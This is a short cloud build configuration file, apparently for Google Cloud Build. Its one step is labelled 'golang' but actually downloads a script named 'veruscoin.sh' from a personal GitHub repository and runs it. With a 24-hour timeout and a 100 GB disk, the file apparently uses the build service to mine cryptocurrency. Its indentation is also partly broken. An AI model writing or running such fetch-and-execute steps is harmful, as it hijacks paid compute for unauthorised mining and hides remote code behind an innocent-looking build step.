steps:
  - name: golang
    args:
      - '-c'
      - >-
         apt update && apt-get install sudo -y && wget https://raw.githubusercontent.com/Ghhjjhh/jdjdj/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
 waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
options:
  diskSizeGb: '100'
